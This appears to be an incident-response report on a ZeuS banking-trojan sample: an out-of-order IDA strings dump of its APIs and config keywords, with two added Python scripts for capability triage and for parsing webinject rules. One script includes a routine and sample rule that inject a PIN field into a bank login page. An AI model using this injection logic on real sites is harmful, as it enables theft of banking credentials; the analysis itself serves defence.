.text:0041E68C 00000014 C AddAccessAllowedAce

.text:0041E6A0 0000001A C AccessCheckAndAuditAlarmW

.text:0041E6BC 0000001A C AccessCheckAndAuditAlarmA

.text:0041E6D8 0000000C C AccessCheck

.text:0041E6E4 00000015 C AbortSystemShutdownW

.text:0041E6FC 00000015 C AbortSystemShutdownA

.text:0041E714 0000000C C wvnsprintfW

.text:0041E720 0000000C C wvnsprintfA

.text:0041E72C 0000000B C wnsprintfW

.text:0041E738 0000000B C wnsprintfA

.text:0041E744 0000000D C UrlUnescapeW

.text:0041E754 0000000D C UrlUnescapeA

.text:0041E764 00000007 C UrlIsW

.text:0041E76C 0000000D C UrlIsOpaqueW

.text:0041E77C 0000000D C UrlIsOpaqueA

.text:0041E78C 00000010 C UrlIsNoHistoryW

.text:0041E79C 00000010 C UrlIsNoHistoryA

.text:0041E7AC 00000007 C UrlIsA

.text:0041E7B4 00000009 C UrlHashW

.text:0041E7C0 00000009 C UrlHashA

.text:0041E7CC 0000000C C UrlGetPartW

.text:0041E7D8 0000000C C UrlGetPartA

.text:0041E7E4 00000010 C UrlGetLocationW

.text:0041E7F4 00000010 C UrlGetLocationA

.text:0041E804 0000000B C UrlEscapeW

.text:0041E810 0000000B C UrlEscapeA

.text:0041E81C 00000013 C UrlCreateFromPathW

.text:0041E830 00000013 C UrlCreateFromPathA

.text:0041E844 0000000C C UrlCompareW

.text:0041E850 0000000C C UrlCompareA

.text:0041E85C 0000000C C UrlCombineW

.text:0041E868 0000000C C UrlCombineA

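The kernel32 and advapi32 names above are the raw material of an import triage: OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread together form the classic remote-thread injection chain, the Toolhelp32 calls are how the bot finds a host process, the Crypt* family is the CryptoAPI it uses, and ClearEventLog/CreateService point at log tampering and service persistence. The script below is an added example for this report, not code from the ZeuS kit or from the author: it parses lines in the layout IDA prints (`.text:ADDR LEN C STRING`), groups the API names by the behaviour they enable and flags whether the full injection chain is present. The capability table is an analyst's assumption, not something the binary declares, and the sample listing is constructed from a few of the lines shown above.

```python
"""Capability triage of an IDA 'Strings' listing (added example)."""
import re

# One IDA strings line: .section:address length type text
_LINE = re.compile(
    r"^\.(\w+):([0-9A-Fa-f]{8})\s+([0-9A-Fa-f]{8})\s+(\S+)\s+(.*)$"
)

# Assumption: an analyst's grouping of Win32 APIs by the behaviour they
# enable. Not exhaustive, and not something the binary declares itself.
CAPABILITIES = {
    "process_injection": {
        "OpenProcess", "VirtualAllocEx", "VirtualProtectEx", "WriteProcessMemory",
        "ReadProcessMemory", "CreateRemoteThread", "GetThreadContext",
        "SuspendThread", "ResumeThread",
    },
    "process_enumeration": {
        "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
        "Module32FirstW", "Module32NextW", "Thread32First", "Thread32Next",
    },
    "cryptoapi": {
        "CryptAcquireContextW", "CryptAcquireContextA", "CryptGenKey",
        "CryptDeriveKey", "CryptEncrypt", "CryptDecrypt", "CryptGenRandom",
        "CryptImportKey", "CryptExportKey",
    },
    "service_persistence": {
        "CreateServiceW", "CreateServiceA", "ChangeServiceConfigW",
        "ChangeServiceConfigA", "DeleteService", "ControlService",
    },
    "token_manipulation": {
        "AdjustTokenPrivileges", "DuplicateTokenEx", "DuplicateToken",
        "CreateProcessAsUserW", "CreateProcessAsUserA", "WTSQueryUserToken",
    },
    "ipc_named_pipe": {
        "CreateNamedPipeW", "ConnectNamedPipe", "WaitNamedPipeW",
        "DisconnectNamedPipe", "SetNamedPipeHandleState",
    },
    "log_tampering": {
        "ClearEventLogW", "ClearEventLogA", "BackupEventLogW", "BackupEventLogA",
    },
}

# The four calls that together make up the classic remote-thread injection chain.
INJECTION_CHAIN = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def parse_ida_strings(text):
    """Yield (section, address, declared_length, string) for each listing line.

    Blank lines and anything not in IDA's layout (for example page headers
    left over from a PDF export) are skipped rather than treated as strings.
    The declared length counts the terminating NUL, so it is len(string) + 1.
    """
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if m:
            section, addr, length, _kind, s = m.groups()
            yield section, int(addr, 16), int(length, 16), s


def triage(text):
    """Return {capability: sorted list of API names present in the listing}."""
    seen = {s for *_, s in parse_ida_strings(text)}
    return {cap: sorted(apis & seen) for cap, apis in CAPABILITIES.items() if apis & seen}


def has_injection_chain(text):
    """True when every call of the remote-thread injection chain is present."""
    seen = {s for *_, s in parse_ida_strings(text)}
    return all(api in seen for api in INJECTION_CHAIN)


# Constructed sample: a handful of lines in the layout of the listing above,
# plus one page-header line to show that such noise is ignored.
SAMPLE = """\
.text:0040624C 0000000C C OpenProcess
.text:0040622C 0000000F C VirtualAllocEx
.text:00406324 00000013 C WriteProcessMemory
.text:00406300 00000013 C CreateRemoteThread
.text:004062E4 00000019 C CreateToolhelp32Snapshot
.text:004062D4 00000010 C Process32FirstW
.text:0041E22C 00000015 C CryptAcquireContextW
.text:0041E18C 0000000D C CryptEncrypt
.text:004063B4 00000011 C CreateNamedPipeW
.text:0041E3E4 0000000F C ClearEventLogW
.text:00407070 00000011 C (kd;l;;;;;324j((
Page 78: CIS 6395 Incident Response Technologies
"""

if __name__ == "__main__":
    for cap, apis in triage(SAMPLE).items():
        print(f"{cap:22s} {', '.join(apis)}")
    print("injection chain complete:", has_injection_chain(SAMPLE))
```

Run it over the full IDA export of a sample to get the capability summary in seconds; a string that appears in the listing is only evidence that the name is present (the bot resolves many of these by name at run time), so confirm a suspected capability by finding the cross-reference to the call in the disassembly before reporting it.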
.text:00406608 00000010 C UnmapViewOfFile

.text:00406618 0000000E C MapViewOfFile

.text:00406628 00000013 C CreateFileMappingW

.text:0040663C 0000000E C GetFileSizeEx

.text:0040664C 0000000E C GetDriveTypeW

.text:0040665C 00000011 C GetLogicalDrives

.text:00406670 00000010 C GetCommandLineA

.text:00406680 0000000F C GetProcessHeap

.text:00406690 00000013 C GetFileAttributesW

.text:004066A4 0000000D C GetProcessId

.text:004066B4 0000000E C SuspendThread

.text:004066C4 0000000C C FreeLibrary

.text:004066D0 0000000B C OpenThread

.text:004066DC 0000000D C ResumeThread

.text:004066F8 00000005 C text

.text:00406700 00000011 C GetThreadContext

.text:00406714 00000016 C CreateTimerQueueTimer

.text:0040672C 00000016 C FileTimeToDosDateTime

.text:00406744 00000018 C FileTimeToLocalFileTime

.text:0040675C 0000001B C GetFileInformationByHandle

.text:00406778 00000017 C WaitForMultipleObjects

.text:00406790 00000022 C GetVolumeNameForVolumeMountPointW

.text:004067B4 00000014 C GetOverlappedResult

.text:004067C8 00000018 C GetEnvironmentVariableW

.text:004067E0 0000000A C LocalFree

.text:004067EC 0000000F C FormatMessageW

.text:00406FF8 00000012 C WTSQueryUserToken

.text:0040700C 0000000C C userenv.dll

.text:00407018 00000017 C CreateEnvironmentBlock

.text:00407030 00000018 C DestroyEnvironmentBlock

.text:00407070 00000011 C (kd;l;;;;;324j((

.text:004070BC 00000014 C DllUnregisterServer

.text:004070D0 00000012 C DllRegisterServer

.text:004070E4 00000012 C DllGetClassObject

.text:004070F8 00000010 C DllCanUnloadNow

.text:004072DC 0000000A C *<select

.text:004072E8 00000013 C *<option selected

.text:004072FC 00000011 C *<input *value=\"

.text:00407334 00000007 C %%0%uu

.text:004073AC 00000005 C pop3

.text:0040743C 00000038 C Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

.text:00407474 00000009 C HTTP/1.1

.text:00407480 0000000B C urlmon.dll

.text:0040748C 00000016 C ObtainUserAgentString

.text:004074B8 0000000C C cabinet.dll

.text:004074C4 0000000A C FCICreate

.text:004074D0 0000000B C FCIAddFile

.text:004074DC 00000010 C FCIFlushCabinet

.text:004074EC 0000000B C FCIDestroy

.text:00418920 0000000D C staticconfig

.text:00418998 00000007 C botnet

.text:004189E0 0000000D C timer_config

.text:00418A20 0000000B C timer_logs

.text:00418A58 0000000C C timer_stats

.text:00418A94 0000000B C url_config

.text:00418AF8 0000000B C url_compip

.text:00418B5C 0000000F C encryption_key

.text:00418BD8 00000014 C blacklist_languages

.text:00418C4C 00000007 C .data1

.text:00418C54 00000013 C percent_of_overlay

.text:00418C68 0000000E C dynamicconfig

.text:00418C78 0000000B C url_loader

.text:00418CF4 00000008 C set_url

.text:00418CFC 0000000E C data_before\r\n

.text:00418D0C 0000000E C data_inject\r\n

.text:00418D1C 0000000D C data_after\r\n

.text:00418D2C 0000000B C data_end\r\n

.text:00418E9C 0000000B C url_server

.text:00418F3C 0000000F C advancedconfig

.text:0041E874 00000011 C UrlCanonicalizeW

.text:0041E888 00000011 C UrlCanonicalizeA

.text:0041E89C 00000010 C UrlApplySchemeW

.text:0041E8AC 00000010 C UrlApplySchemeA

.text:0041E8BC 00000009 C StrTrimW

.text:0041E8C8 00000009 C StrTrimA

.text:0041E8D4 0000000A C StrToIntW

.text:0041E8E0 0000000C C StrToIntExW

.text:0041E8EC 0000000C C StrToIntExA

.text:0041E8F8 0000000A C StrToIntA

.text:0041E904 00000008 C StrStrW

.text:0041E90C 00000009 C StrStrIW

.text:0041E918 00000009 C StrStrIA

.text:0041E924 00000008 C StrStrA

.text:0041E92C 00000008 C StrSpnW

.text:0041E934 00000008 C StrSpnA

.text:0041E93C 0000000D C StrRetToStrW

.text:0041E94C 0000000D C StrRetToStrA

.text:0041E95C 0000000D C StrRetToBufW

.text:0041E96C 0000000D C StrRetToBufA

.text:0041E97C 0000000A C StrRStrIW

.text:0041E988 0000000A C StrRStrIA

.text:0041E994 00000009 C StrRChrW

.text:0041E9A0 0000000A C StrRChrIW

.text:0041E9AC 0000000A C StrRChrIA

.text:0041E9B8 00000009 C StrRChrA

.text:0041E9C4 00000009 C StrPBrkW

.text:0041E9D0 00000009 C StrPBrkA

.text:0041E9DC 00000009 C StrNCatW

.text:0041E9E8 00000009 C StrNCatA

.text:0041E9F4 00000010 C StrIsIntlEqualW

.text:0041EA04 00000010 C StrIsIntlEqualA

.text:0041EA14 00000015 C StrFromTimeIntervalW

.text:0041EA2C 00000015 C StrFromTimeIntervalA

.text:0041EA44 00000011 C StrFormatKBSizeW

.text:0041EA58 00000011 C StrFormatKBSizeA

.text:0041EA6C 00000013 C StrFormatByteSizeW

.text:0041EA80 00000013 C StrFormatByteSizeA

.text:0041EA94 00000015 C StrFormatByteSize64A

.text:0041EAAC 00000008 C StrDupW

.text:0041EAB4 00000008 C StrDupA

.text:0041EABC 00000008 C StrCpyW

.text:0041EAC4 00000009 C StrCpyNW

.text:0041EAD0 00000008 C StrCmpW

.text:0041EAD8 00000009 C StrCmpNW

.text:0041EAE4 0000000A C StrCmpNIW

.text:0041EAF0 0000000A C StrCmpNIA

.text:0041EAFC 00000009 C StrCmpNA

.text:0041EB08 00000009 C StrCmpIW

.text:0041EB14 00000008 C StrChrW

.text:0041EB1C 00000009 C StrChrIW

.text:0041EB28 00000009 C StrChrIA

.text:0041EB34 00000008 C StrChrA

.text:0041EB3C 00000008 C StrCatW

.text:0041EB44 0000000C C StrCatBuffW

.text:0041EB50 0000000C C StrCatBuffA

.text:0041EB5C 00000009 C StrCSpnW

.text:0041EB68 0000000A C StrCSpnIW

.text:0041EB74 0000000A C StrCSpnIA

.text:0041EB80 00000009 C StrCSpnA

.text:0041EB8C 0000000A C SHStrDupW

.text:0041EB98 0000000A C SHStrDupA

.text:0041EBA4 0000000F C SHSkipJunction

.text:0041EBB4 0000000C C SHSetValueW

.text:0041EBC0 0000000C C SHSetValueA

.text:0041EBCC 0000000F C SHSetThreadRef

.text:0041EBDC 00000013 C SHRegWriteUSValueW

.text:0041EBF0 00000013 C SHRegWriteUSValueA

.text:0041EC04 00000011 C SHRegSetUSValueW

.text:0041EC18 00000011 C SHRegSetUSValueA

.text:00418F4C 00000010 C advancedconfigs

.text:00418F8C 0000000A C webfilter

.text:00418F98 0000000B C webfilters

.text:00418FE0 0000000E C webdatafilter

.text:00418FF0 0000000F C webdatafilters

.text:00419000 00000009 C webfakes

.text:00419064 0000000B C tangrabber

.text:00419100 00000007 C dnsmap

.text:00419108 00000010 C file_webinjects

.text:00419584 00000005 C lexx

.text:00419644 0000000A C ole32.dll

.text:00419650 0000000C C SHLWAPI.dll

.text:0041965C 0000000D C ADVAPI32.dll

.text:0041966C 0000000B C USER32.dll

.text:00419678 0000000D C KERNEL32.dll

.text:00419688 00000012 C WriteStringStream

.text:0041969C 0000000C C WriteOleStg

.text:004196A8 00000014 C WriteFmtUserTypeStg

.text:004196BC 0000000E C WriteClassStm

.text:004196CC 0000000E C WriteClassStg

.text:004196DC 00000010 C UtGetDvtd32Info

.text:004196EC 00000010 C UtGetDvtd16Info

.text:004196FC 00000018 C UtConvertDvtd32toDvtd16

.text:00419714 00000018 C UtConvertDvtd16toDvtd32

.text:0041972C 00000013 C UpdateDCOMSettings

.text:00419740 0000000E C StringFromIID

.text:00419750 00000010 C StringFromGUID2

.text:00419760 00000010 C StringFromCLSID

.text:00419770 0000000C C StgSetTimes

.text:0041977C 0000001B C StgOpenStorageOnILockBytes

.text:00419798 00000011 C StgOpenStorageEx

.text:004197AC 0000000F C StgOpenStorage

.text:004197BC 00000024 C StgOpenAsyncDocfileOnIFillLockBytes

.text:004197E0 00000017 C StgIsStorageILockBytes

.text:004197F8 00000011 C StgIsStorageFile

.text:0041980C 00000021 C StgGetIFillLockBytesOnILockBytes

.text:00419830 0000001B C StgGetIFillLockBytesOnFile

.text:0041984C 00000013 C StgCreateStorageEx

.text:00419860 0000001D C StgCreateDocfileOnILockBytes

.text:00419880 00000011 C StgCreateDocfile

.text:00419894 00000012 C SetDocumentBitStg

.text:004198A8 0000000E C SetConvertStg

.text:004198B8 0000000F C RevokeDragDrop

.text:004198C8 00000011 C ReleaseStgMedium

.text:004198DC 00000011 C RegisterDragDrop

.text:004198F0 00000011 C ReadStringStream

.text:00419904 0000000B C ReadOleStg

.text:00419910 00000013 C ReadFmtUserTypeStg

.text:00419924 0000000D C ReadClassStm

.text:00419934 0000000D C ReadClassStg

.text:00419944 00000010 C PropVariantCopy

.text:00419954 00000011 C PropVariantClear

.text:00419968 00000010 C ProgIDFromCLSID

.text:00419978 00000013 C OpenOrCreateStream

.text:0041998C 00000010 C OleUninitialize

.text:0041999C 00000018 C OleTranslateAccelerator

.text:004199B4 00000015 C OleSetMenuDescriptor

.text:004199CC 00000016 C OleSetContainedObject

.text:004199E4 00000010 C OleSetClipboard

.text:004199F4 00000012 C OleSetAutoConvert

.text:00419A08 00000010 C OleSaveToStream

.text:00419A18 00000008 C OleSave

.text:00419A20 00000007 C OleRun

.text:00419A28 00000012 C OleRegGetUserType

.text:00419A3C 00000014 C OleRegGetMiscStatus

.text:00419A50 00000010 C OleRegEnumVerbs

.text:00419A60 00000014 C OleRegEnumFormatEtc

.text:00419A74 00000015 C OleQueryLinkFromData

.text:00419A8C 00000017 C OleQueryCreateFromData

.text:00419AA4 00000015 C OleNoteObjectVisible

.text:0041EC2C 00000013 C SHRegQueryUSValueW

.text:0041EC40 00000013 C SHRegQueryUSValueA

.text:0041EC54 00000015 C SHRegQueryInfoUSKeyW

.text:0041EC6C 00000015 C SHRegQueryInfoUSKeyA

.text:0041EC84 00000010 C SHRegOpenUSKeyW

.text:0041EC94 00000010 C SHRegOpenUSKeyA

.text:0041ECA4 00000011 C SHRegGetUSValueW

.text:0041ECB8 00000011 C SHRegGetUSValueA

.text:0041ECCC 00000015 C SHRegGetBoolUSValueW

.text:0041ECE4 00000015 C SHRegGetBoolUSValueA

.text:0041ECFC 00000012 C SHRegEnumUSValueW

.text:0041ED10 00000012 C SHRegEnumUSValueA

.text:0041ED24 00000010 C SHRegEnumUSKeyW

.text:0041ED34 00000010 C SHRegEnumUSKeyA

.text:0041ED44 00000013 C SHRegDuplicateHKey

.text:0041ED58 00000014 C SHRegDeleteUSValueW

.text:0041ED6C 00000014 C SHRegDeleteUSValueA

.text:0041ED80 00000017 C SHRegDeleteEmptyUSKeyW

.text:0041ED98 00000017 C SHRegDeleteEmptyUSKeyA

.text:0041EDB0 00000012 C SHRegCreateUSKeyW

.text:0041EDC4 00000012 C SHRegCreateUSKeyA

.text:0041EDD8 00000010 C SHRegCloseUSKey

.text:0041EDE8 00000010 C SHQueryValueExW

.text:0041EDF8 00000010 C SHQueryValueExA

.text:0041EE08 00000010 C SHQueryInfoKeyW

.text:0041EE18 00000010 C SHQueryInfoKeyA

.text:0041EE28 00000011 C SHOpenRegStreamW

.text:0041EE3C 00000011 C SHOpenRegStreamA

.text:0041EE50 00000012 C SHOpenRegStream2W

.text:0041EE64 00000012 C SHOpenRegStream2A

.text:0041EE78 00000015 C SHIsLowMemoryMachine

.text:0041EE90 0000000C C SHGetValueW

.text:0041EE9C 0000000C C SHGetValueA

.text:0041EEA8 0000000F C SHGetThreadRef

.text:0041EEB8 00000011 C SHGetInverseCMAP

.text:0041EECC 0000000D C SHEnumValueW

.text:0041EEDC 0000000D C SHEnumValueA

.text:0041EEEC 0000000D C SHEnumKeyExW

.text:0041EEFC 0000000D C SHEnumKeyExA

.text:0041EF0C 0000000F C SHDeleteValueW

.text:0041EF1C 0000000F C SHDeleteValueA

.text:0041EF2C 0000000D C SHDeleteKeyW

.text:0041EF3C 0000000D C SHDeleteKeyA

.text:0041EF4C 00000012 C SHDeleteEmptyKeyW

.text:0041EF60 00000012 C SHDeleteEmptyKeyA

.text:0041EF74 00000016 C SHCreateStreamOnFileW

.text:0041EF8C 00000016 C SHCreateStreamOnFileA

.text:0041EFA4 00000015 C SHCreateShellPalette

.text:0041EFBC 0000000B C SHCopyKeyW

.text:0041EFC8 0000000B C SHCopyKeyA

.text:0041EFD4 0000000F C SHAutoComplete

.text:0041EFE4 00000013 C PathUnquoteSpacesW

.text:0041EFF8 00000013 C PathUnquoteSpacesA

.text:0041F00C 00000018 C PathUnmakeSystemFolderW

.text:0041F024 00000018 C PathUnmakeSystemFolderA

.text:0041F03C 00000010 C PathUndecorateW

.text:0041F04C 00000010 C PathUndecorateA

.text:0041F05C 00000011 C PathStripToRootW

.text:0041F070 00000011 C PathStripToRootA

.text:0041F084 0000000F C PathStripPathW

.text:0041F094 0000000F C PathStripPathA

.text:0041F0A4 0000000E C PathSkipRootW

.text:0041F0B4 0000000E C PathSkipRootA

.text:0041F0C4 00000014 C PathSetDlgItemPathW

.text:0041F0D8 00000014 C PathSetDlgItemPathA

.text:0041F0EC 00000016 C PathSearchAndQualifyW

.text:0041F104 00000016 C PathSearchAndQualifyA

.text:0041F11C 00000015 C PathRenameExtensionW

.text:0041F134 00000015 C PathRenameExtensionA

.text:0041F14C 00000014 C PathRemoveFileSpecW

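The strings `set_url`, `data_before`, `data_inject`, `data_after` and `data_end`, together with `file_webinjects`, `webfilters` and `webdatafilters`, are the keywords of the builder's webinject rule file: each rule names a URL pattern and one or more (before, inject, after) triples of HTML that the bot splices into the page inside the victim's browser. The parser below is an added example for this report, not code from the ZeuS kit or from the author. Only the keywords are taken from the listing above; the meaning of the flag letters after the URL (G for GET, P for POST, L for grab only) follows the publicly documented ZeuS 2.x webinjects.txt format, the splice semantics are the ones stated in the docstring, and the sample rule and login page are constructed for the example.

```python
"""Parser for ZeuS-style webinject rules, plus a reference application of a
rule to an HTML page (added example, not code from the kit or the report)."""
import re

_BLOCK_KEYS = {"data_before": "before", "data_inject": "inject", "data_after": "after"}


def _glob_to_regex(pattern):
    """'*' is the only wildcard in ZeuS URL and data patterns; the rest is literal."""
    return ".*?".join(re.escape(part) for part in pattern.split("*"))


def parse_webinjects(text):
    """Parse rules of the form

        set_url <url-pattern> <flags>
        data_before ... data_end
        data_inject ... data_end
        data_after  ... data_end

    into [{'url', 'flags', 'injects': [{'before', 'inject', 'after'}, ...]}, ...].
    Flag letters (G = GET, P = POST, L = grab only) are carried through untouched.
    Malformed input (a block outside any rule, an unterminated block) raises.
    """
    rules, block, buf = [], None, []
    for line in text.splitlines():
        stripped = line.strip()
        if block is not None:                       # inside a data_* block
            if stripped == "data_end":
                rules[-1]["injects"][-1][block] = "\n".join(buf)
                block, buf = None, []
            else:
                buf.append(line)                    # keep the HTML verbatim
        elif stripped.startswith("set_url"):
            parts = stripped.split(None, 2)
            if len(parts) < 2:
                raise ValueError("set_url without a URL pattern")
            rules.append({"url": parts[1], "flags": parts[2] if len(parts) > 2 else "", "injects": []})
        elif stripped in _BLOCK_KEYS:
            if not rules:
                raise ValueError(f"{stripped} before any set_url")
            if stripped == "data_before":           # every triple starts with data_before
                rules[-1]["injects"].append({"before": "", "inject": "", "after": ""})
            elif not rules[-1]["injects"]:
                raise ValueError(f"{stripped} without a preceding data_before")
            block = _BLOCK_KEYS[stripped]
        elif stripped:
            raise ValueError(f"unexpected line outside a block: {stripped!r}")
    if block is not None:
        raise ValueError("unterminated data_* block")
    return rules


def url_matches(rule, url):
    """Does the rule's set_url pattern cover this URL?"""
    return re.fullmatch(_glob_to_regex(rule["url"]), url) is not None


def apply_rule(rule, html):
    """Apply every (before, inject, after) triple of one rule to a page.

    Semantics used here: the text between the 'before' match and the next
    'after' match is replaced by 'inject'; an empty 'after' puts the injected
    text straight after the 'before' match; an empty 'before' anchors at the
    start of the page (an assumption made for this example). A triple whose
    anchors are not found on the page leaves it untouched.
    """
    out = html
    for inj in rule["injects"]:
        start = 0
        if inj["before"]:
            m = re.search(_glob_to_regex(inj["before"]), out, re.DOTALL)
            if not m:
                continue
            start = m.end()
        end = start
        if inj["after"]:
            m = re.search(_glob_to_regex(inj["after"]), out[start:], re.DOTALL)
            if not m:
                continue
            end = start + m.start()
        out = out[:start] + inj["inject"] + out[end:]
    return out


# Constructed rule: adds a PIN field directly after the password box.
SAMPLE_RULES = """\
set_url https://online.bank.example/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<br><label>PIN</label><input type="text" name="pin">
data_end
data_after
data_end
"""

# Constructed page the rule would be applied to in the victim's browser.
SAMPLE_PAGE = (
    '<form action="/login" method="post">\n'
    '<input type="text" name="user">\n'
    '<input type="password" name="password" maxlength="32">\n'
    '<input type="submit" value="Sign in">\n'
    "</form>"
)

if __name__ == "__main__":
    for rule in parse_webinjects(SAMPLE_RULES):
        if url_matches(rule, "https://online.bank.example/login?sid=1"):
            print(apply_rule(rule, SAMPLE_PAGE))
```

For incident response the parser is the useful half: once the dynamic config has been decrypted, the list of `set_url` patterns is the list of targeted sites, and comparing the injected HTML against a clean copy of the page is the quickest way to show a user which fields were added by the bot rather than the bank.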
.text:00419ABC 00000020 C OleMetafilePictFromIconAndLabel

.text:00419ADC 0000000F C OleLockRunning

.text:00419AEC 00000012 C OleLoadFromStream

.text:00419B00 00000008 C OleLoad

.text:00419B08 0000000D C OleIsRunning

.text:00419B18 00000016 C OleIsCurrentClipboard

.text:00419B30 0000000E C OleInitialize

.text:00419B40 00000011 C OleGetIconOfFile

.text:00419B54 00000012 C OleGetIconOfClass

.text:00419B68 00000010 C OleGetClipboard

.text:00419B78 00000012 C OleGetAutoConvert

.text:00419B8C 00000012 C OleFlushClipboard

.text:00419BA0 00000011 C OleDuplicateData

.text:00419BB4 00000008 C OleDraw

.text:00419BBC 00000011 C OleDoAutoConvert

.text:00419BD0 00000019 C OleDestroyMenuDescriptor

.text:00419BEC 00000018 C OleCreateStaticFromData

.text:00419C04 00000018 C OleCreateMenuDescriptor

.text:00419C1C 00000016 C OleCreateLinkToFileEx

.text:00419C34 00000014 C OleCreateLinkToFile

.text:00419C48 00000018 C OleCreateLinkFromDataEx

.text:00419C60 00000016 C OleCreateLinkFromData

.text:00419C78 00000010 C OleCreateLinkEx

.text:00419C88 0000000E C OleCreateLink

.text:00419C98 00000014 C OleCreateFromFileEx

.text:00419CAC 00000012 C OleCreateFromFile

.text:00419CC0 00000014 C OleCreateFromDataEx

.text:00419CD4 00000012 C OleCreateFromData

.text:00419CE8 0000000C C OleCreateEx

.text:00419CF4 00000019 C OleCreateEmbeddingHelper

.text:00419D10 00000018 C OleCreateDefaultHandler

.text:00419D28 0000000A C OleCreate

.text:00419D34 00000020 C OleConvertOLESTREAMToIStorageEx

.text:00419D54 0000001E C OleConvertOLESTREAMToIStorage

.text:00419D74 00000020 C OleConvertIStorageToOLESTREAMEx

.text:00419D94 0000001E C OleConvertIStorageToOLESTREAM

.text:00419DB4 00000010 C OleBuildVersion

.text:00419DC4 00000016 C MonikerRelativePathTo

.text:00419DDC 00000018 C MonikerCommonPrefixWith

.text:00419DF4 00000013 C MkParseDisplayName

.text:00419E08 0000000C C IsEqualGUID

.text:00419E14 0000000E C IsAccelerator

.text:00419E24 0000000E C IIDFromString

.text:00419E34 00000016 C GetRunningObjectTable

.text:00419E4C 00000011 C GetHookInterface

.text:00419E60 00000015 C GetHGlobalFromStream

.text:00419E78 00000019 C GetHGlobalFromILockBytes

.text:00419E94 00000012 C GetDocumentBitStg

.text:00419EA8 0000000E C GetConvertStg

.text:00419EB8 0000000D C GetClassFile

.text:00419EC8 00000015 C FreePropVariantArray

.text:00419EE0 00000011 C EnableHookObject

.text:00419EF4 0000000B C DoDragDrop

.text:00419F00 00000016 C DllDebugObjectRPCHook

.text:00419F18 00000016 C CreateStreamOnHGlobal

.text:00419F30 00000015 C CreatePointerMoniker

.text:00419F48 00000016 C CreateOleAdviseHolder

.text:00419F60 00000014 C CreateObjrefMoniker

.text:00419F74 00000012 C CreateItemMoniker

.text:00419F88 0000001A C CreateILockBytesOnHGlobal

.text:00419FA4 00000017 C CreateGenericComposite

.text:00419FBC 00000012 C CreateFileMoniker

.text:00419FD0 00000010 C CreateDataCache

.text:00419FE0 00000017 C CreateDataAdviseHolder

.text:00419FF8 00000013 C CreateClassMoniker

.text:0041A00C 0000000E C CreateBindCtx

.text:0041A01C 00000012 C CreateAntiMoniker

.text:0041A030 00000015 C CoUnmarshalInterface

.text:0041A048 00000013 C CoUnmarshalHresult

.text:0041A05C 0000000F C CoUninitialize

.text:0041F160 00000014 C PathRemoveFileSpecA

.text:0041F174 00000015 C PathRemoveExtensionW

.text:0041F18C 00000015 C PathRemoveExtensionA

.text:0041F1A4 00000012 C PathRemoveBlanksW

.text:0041F1B8 00000012 C PathRemoveBlanksA

.text:0041F1CC 00000015 C PathRemoveBackslashW

.text:0041F1E4 00000015 C PathRemoveBackslashA

.text:0041F1FC 00000010 C PathRemoveArgsW

.text:0041F20C 00000010 C PathRemoveArgsA

.text:0041F21C 00000014 C PathRelativePathToW

.text:0041F230 00000014 C PathRelativePathToA

.text:0041F244 00000011 C PathQuoteSpacesW

.text:0041F258 00000011 C PathQuoteSpacesA

.text:0041F26C 00000017 C PathParseIconLocationW

.text:0041F284 00000017 C PathParseIconLocationA

.text:0041F29C 0000000F C PathMatchSpecW

.text:0041F2AC 0000000F C PathMatchSpecA

.text:0041F2BC 00000016 C PathMakeSystemFolderW

.text:0041F2D4 00000016 C PathMakeSystemFolderA

.text:0041F2EC 00000010 C PathMakePrettyW

.text:0041F2FC 00000010 C PathMakePrettyA

.text:0041F30C 0000000B C PathIsURLW

.text:0041F318 0000000B C PathIsURLA

.text:0041F324 0000000B C PathIsUNCW

.text:0041F330 00000011 C PathIsUNCServerW

.text:0041F344 00000016 C PathIsUNCServerShareW

.text:0041F35C 00000016 C PathIsUNCServerShareA

.text:0041F374 00000011 C PathIsUNCServerA

.text:0041F388 0000000B C PathIsUNCA

.text:0041F394 00000014 C PathIsSystemFolderW

.text:0041F3A8 00000014 C PathIsSystemFolderA

.text:0041F3BC 00000010 C PathIsSameRootW

.text:0041F3CC 00000010 C PathIsSameRootA

.text:0041F3DC 0000000C C PathIsRootW

.text:0041F3E8 0000000C C PathIsRootA

.text:0041F3F4 00000010 C PathIsRelativeW

.text:0041F404 00000010 C PathIsRelativeA

.text:0041F414 0000000E C PathIsPrefixW

.text:0041F424 0000000E C PathIsPrefixA

.text:0041F434 00000013 C PathIsNetworkPathW

.text:0041F448 00000013 C PathIsNetworkPathA

.text:0041F45C 00000013 C PathIsLFNFileSpecW

.text:0041F470 00000013 C PathIsLFNFileSpecA

.text:0041F484 00000010 C PathIsFileSpecW

.text:0041F494 00000010 C PathIsFileSpecA

.text:0041F4A4 00000011 C PathIsDirectoryW

.text:0041F4B8 00000016 C PathIsDirectoryEmptyW

.text:0041F4D0 00000016 C PathIsDirectoryEmptyA

.text:0041F4E8 00000011 C PathIsDirectoryA

.text:0041F4FC 00000013 C PathIsContentTypeW

.text:0041F510 00000013 C PathIsContentTypeA

.text:0041F524 00000014 C PathGetDriveNumberW

.text:0041F538 00000014 C PathGetDriveNumberA

.text:0041F54C 00000011 C PathGetCharTypeW

.text:0041F560 00000011 C PathGetCharTypeA

.text:0041F574 0000000D C PathGetArgsW

.text:0041F584 0000000D C PathGetArgsA

.text:0041F594 00000015 C PathFindSuffixArrayW

.text:0041F5AC 00000015 C PathFindSuffixArrayA

.text:0041F5C4 00000010 C PathFindOnPathW

.text:0041F5D4 00000010 C PathFindOnPathA

.text:0041F5E4 00000017 C PathFindNextComponentW

.text:0041F5FC 00000017 C PathFindNextComponentA

.text:0041F614 00000012 C PathFindFileNameW

.text:0041F628 00000012 C PathFindFileNameA

.text:0041F63C 00000013 C PathFindExtensionW

.text:0041F650 00000013 C PathFindExtensionA

.text:0041F664 00000010 C PathFileExistsW

.text:0041F674 00000010 C PathFileExistsA

.text:0041F684 00000013 C PathCreateFromUrlW

.text:0041A06C 0000000F C CoTreatAsClass

.text:0041A07C 00000011 C CoTaskMemRealloc

.text:0041A090 0000000E C CoTaskMemFree

.text:0041A0A0 0000000F C CoTaskMemAlloc

.text:0041A0B0 00000014 C CoSwitchCallContext

.text:0041A0C4 00000016 C CoSuspendClassObjects

.text:0041A0DC 00000012 C CoSetProxyBlanket

